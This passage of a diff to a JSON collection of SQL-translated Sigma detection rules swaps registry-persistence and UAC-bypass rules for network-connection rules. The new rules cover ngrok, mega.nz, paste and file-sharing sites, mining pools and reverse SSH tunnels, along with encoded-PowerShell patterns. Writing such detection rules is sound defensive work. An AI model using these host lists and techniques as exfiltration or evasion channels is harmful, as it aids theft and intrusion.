'\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_outlook_todaypage.yml" + "filename": "net_connection_win_binary_susp_com.yml" }, { - "title": "UAC Bypass via Event Viewer - Registry Set", - "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", - "status": "experimental", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "title": "Notepad Making Network Connection", + "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "status": "test", + "description": "Detects suspicious network connection by Notepad", + "author": "EagleEye Team", "tags": [ + "attack.command_and_control", + "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" ], - "filename": "registry_set_uac_bypass_eventvwr.yml" + "filename": "net_connection_win_notepad_network_connection.yml" }, { - "title": "Registry Persistence via Explorer Run Key", - "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", + "title": "Silenttrinity Stager Msbuild Activity", + "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", "status": "test", - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects a possible remote connections to Silenttrinity c2", + "author": "Kiran kumar s, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.execution", + "attack.t1127.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((NewValue LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR NewValue LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" ], - "filename": "registry_set_susp_reg_persist_explorer_run.yml" + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" }, { - "title": "Suspicious Environment Variable Has Been Registered", - "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", - "status": "test", - "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Dropbox API Usage", + "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "status": "experimental", + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate use of the API with a tool that the author wasn't aware of" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + ], + "filename": "net_connection_win_susp_dropbox_api.yml" + }, + { + "title": "Communication To Ngrok.Io", + "id": "18249279-932f-45e2-b37a-8925f2597670", + "status": "experimental", + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok.io" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (NewValue IN ('powershell', 'pwsh') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR NewValue LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR NewValue LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%SW52b2tlL%' ESCAPE '\\' OR NewValue LIKE '%ludm9rZS%' ESCAPE '\\' OR NewValue LIKE '%JbnZva2Ut%' ESCAPE '\\' OR NewValue LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR NewValue LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR NewValue LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (NewValue LIKE 'SUVY%' ESCAPE '\\' OR NewValue LIKE 'SQBFAF%' ESCAPE '\\' OR NewValue LIKE 'SQBuAH%' ESCAPE '\\' OR NewValue LIKE 'cwBhA%' ESCAPE '\\' OR NewValue LIKE 'aWV4%' ESCAPE '\\' OR NewValue LIKE 'aQBlA%' ESCAPE '\\' OR NewValue LIKE 'R2V0%' ESCAPE '\\' OR NewValue LIKE 'dmFy%' ESCAPE '\\' OR NewValue LIKE 'dgBhA%' ESCAPE '\\' OR NewValue LIKE 'dXNpbm%' ESCAPE '\\' OR NewValue LIKE 'H4sIA%' ESCAPE '\\' OR NewValue LIKE 'Y21k%' ESCAPE '\\' OR NewValue LIKE 'cABhAH%' ESCAPE '\\' OR NewValue LIKE 'Qzpc%' ESCAPE '\\' OR NewValue LIKE 'Yzpc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" ], - "filename": "registry_set_suspicious_env_variables.yml" + "filename": "net_connection_win_ngrok_io.yml" }, { - "title": "Potential Registry Persistence Attempt Via Windows Telemetry", - "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", + "title": "Communication To Mega.nz", + "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "status": "test", - "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - "author": "Lednyov Alexey, oscd.community, Sreeman", + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of mega.nz uploaders and tools" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (NewValue LIKE '%.sh%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.bin%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.cmd%' ESCAPE '\\' OR NewValue LIKE '%.js%' ESCAPE '\\' OR NewValue LIKE '%.ps%' ESCAPE '\\' OR NewValue LIKE '%.vb%' ESCAPE '\\' OR NewValue LIKE '%.jar%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.msi%' ESCAPE '\\' OR NewValue LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((NewValue LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR NewValue LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" ], - "filename": "registry_set_telemetry_persistence.yml" + "filename": "net_connection_win_mega_nz.yml" }, { - "title": "UAC Bypass via Sdclt", - "id": "5b872a46-3b90-45c1-8419-f675db8053aa", - "status": "experimental", - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", - "author": "Omer Yampel, Christian Burkard (Nextron Systems)", + "title": "Regsvr32 Network Activity", + "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ + "attack.execution", + "attack.t1559.001", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" ], - "filename": "registry_set_uac_bypass_sdclt.yml" + "filename": "net_connection_win_regsvr32_network_activity.yml" }, { - "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", - "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", - "status": "experimental", - "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", - "author": "frack113", + "title": "Network Communication With Crypto Mining Pool", + "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "status": "stable", + "description": "Detects initiated network connections to crypto mining pools", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE DestinationHostname IN ('alimabi.cn', 'ap.luckpool.net', 'bcn.pool.minergate.com', 'bcn.vip.pool.minergate.com', 'bohemianpool.com', 'ca.minexmr.com', 'ca.monero.herominers.com', 'cbd.monerpool.org', 'cbdv2.monerpool.org', 'cryptmonero.com', 'crypto-pool.fr', 'crypto-pool.info', 'cryptonight-hub.miningpoolhub.com', 'd1pool.ddns.net', 'd5pool.us', 'daili01.monerpool.org', 'de.minexmr.com', 'dl.nbminer.com', 'donate.graef.in', 'donate.ssl.xmrig.com', 'donate.v2.xmrig.com', 'donate.xmrig.com', 'donate2.graef.in', 'drill.moneroworld.com', 'dwarfpool.com', 'emercoin.com', 'emercoin.net', 'emergate.net', 'ethereumpool.co', 'eu.luckpool.net', 'eu.minerpool.pw', 'fcn-xmr.pool.minergate.com', 'fee.xmrig.com', 'fr.minexmr.com', 'hellominer.com', 'herominers.com', 'huadong1-aeon.ppxxmr.com', 'iwanttoearn.money', 'jw-js1.ppxxmr.com', 'koto-pool.work', 'lhr.nbminer.com', 'lhr3.nbminer.com', 'linux.monerpool.org', 'lokiturtle.herominers.com', 'luckpool.net', 'masari.miner.rocks', 'mine.c3pool.com', 'mine.moneropool.com', 'mine.ppxxmr.com', 'mine.zpool.ca', 'mine1.ppxxmr.com', 'minemonero.gq', 'miner.ppxxmr.com', 'miner.rocks', 'minercircle.com', 'minergate.com', 'minerpool.pw', 'minerrocks.com', 'miners.pro', 'minerxmr.ru', 'minexmr.cn', 'minexmr.com', 'mining-help.ru', 'miningpoolhub.com', 'mixpools.org', 'moner.monerpool.org', 'moner1min.monerpool.org', 'monero-master.crypto-pool.fr', 'monero.crypto-pool.fr', 'monero.hashvault.pro', 'monero.herominers.com', 'monero.lindon-pool.win', 'monero.miners.pro', 'monero.riefly.id', 'monero.us.to', 'monerocean.stream', 'monerogb.com', 'monerohash.com', 'moneroocean.stream', 'moneropool.com', 'moneropool.nl', 'monerorx.com', 'monerpool.org', 'moriaxmr.com', 'mro.pool.minergate.com', 'multipool.us', 'myxmr.pw', 'na.luckpool.net', 'nanopool.org', 'nbminer.com', 'node3.luckpool.net', 'noobxmr.com', 'pangolinminer.comgandalph3000.com', 'pool.4i7i.com', 'pool.armornetwork.org', 'pool.cortins.tk', 'pool.gntl.co.uk', 'pool.hashvault.pro', 'pool.minergate.com', 'pool.minexmr.com', 'pool.monero.hashvault.pro', 'pool.ppxxmr.com', 'pool.somec.cc', 'pool.support', 'pool.supportxmr.com', 'pool.usa-138.com', 'pool.xmr.pt', 'pool.xmrfast.com', 'pool2.armornetwork.org', 'poolchange.ppxxmr.com', 'pooldd.com', 'poolmining.org', 'poolto.be', 'ppxvip1.ppxxmr.com', 'ppxxmr.com', 'prohash.net', 'r.twotouchauthentication.online', 'randomx.xmrig.com', 'ratchetmining.com', 'seed.emercoin.com', 'seed.emercoin.net', 'seed.emergate.net', 'seed1.joulecoin.org', 'seed2.joulecoin.org', 'seed3.joulecoin.org', 'seed4.joulecoin.org', 'seed5.joulecoin.org', 'seed6.joulecoin.org', 'seed7.joulecoin.org', 'seed8.joulecoin.org', 'sg.minexmr.com', 'sheepman.mine.bz', 'siamining.com', 'sumokoin.minerrocks.com', 'supportxmr.com', 'suprnova.cc', 'teracycle.net', 'trtl.cnpool.cc', 'trtl.pool.mine2gether.com', 'turtle.miner.rocks', 'us-west.minexmr.com', 'usxmrpool.com', 'viaxmr.com', 'webservicepag.webhop.net', 'xiazai.monerpool.org', 'xiazai1.monerpool.org', 'xmc.pool.minergate.com', 'xmo.pool.minergate.com', 'xmr-asia1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-us.suprnova.cc', 'xmr-usa.dwarfpool.com', 'xmr.2miners.com', 'xmr.5b6b7b.ru', 'xmr.alimabi.cn', 'xmr.bohemianpool.com', 'xmr.crypto-pool.fr', 'xmr.crypto-pool.info', 'xmr.f2pool.com', 'xmr.hashcity.org', 'xmr.hex7e4.ru', 'xmr.ip28.net', 'xmr.monerpool.org', 'xmr.mypool.online', 'xmr.nanopool.org', 'xmr.pool.gntl.co.uk', 'xmr.pool.minergate.com', 'xmr.poolto.be', 'xmr.ppxxmr.com', 'xmr.prohash.net', 'xmr.simka.pw', 'xmr.somec.cc', 'xmr.suprnova.cc', 'xmr.usa-138.com', 'xmr.vip.pool.minergate.com', 'xmr1min.monerpool.org', 'xmrf.520fjh.org', 'xmrf.fjhan.club', 'xmrfast.com', 'xmrigcc.graef.in', 'xmrminer.cc', 'xmrpool.de', 'xmrpool.eu', 'xmrpool.me', 'xmrpool.net', 'xmrpool.xyz', 'xx11m.monerpool.org', 'xx11mv2.monerpool.org', 'xxx.hex7e4.ru', 'zarabotaibitok.ru', 'zer0day.ru')" ], - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" + "filename": "net_connection_win_crypto_mining_pools.yml" }, { - "title": "Enabling COR Profiler Environment Variables", - "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", - "status": "test", - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "title": "Script Initiated Connection to Non-Local Network", + "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "status": "experimental", + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", + "author": "frack113, Florian Roth", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.012" + "attack.command_and_control", + "attack.t1105" + ], + "falsepositives": [ + "Legitimate scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" ], - "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + "filename": "net_connection_win_script_wan.yml" }, { - "title": "Potential Persistence Via App Paths Default Property", - "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "title": "Communication To Ngrok Tunneling Service", + "id": "1d08ac94-400d-4469-a82f-daee9a908849", "status": "experimental", - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.012" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" ], "falsepositives": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + "Legitimate use of ngrok" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%iex%' ESCAPE '\\' OR NewValue LIKE '%Invoke-%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%regsvr32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_app_paths.yml" + "filename": "net_connection_win_ngrok_tunnel.yml" }, { - "title": "Blackbyte Ransomware Registry", - "id": "83314318-052a-4c90-a1ad-660ece38d276", + "title": "RDP Over Reverse SSH Tunnel", + "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", "status": "test", - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "author": "frack113", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" ], - "filename": "registry_set_blackbyte_ransomware.yml" + "filename": "net_connection_win_rdp_reverse_tunnel.yml" }, { - "title": "Potential Persistence Via MyComputer Registry Keys", - "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", - "status": "experimental", - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Program Location with Network Connections", + "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "status": "test", + "description": "Detects programs with network connections running in suspicious files system locations", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_mycomputer.yml" + "filename": "net_connection_win_susp_prog_location_network_connection.yml" }, { - "title": "Service Binary in Suspicious Folder", - "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "title": "Suspicious Network Connection Binary No CommandLine", + "id": "20384606-a124-4fec-acbb-8bd373728613", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = 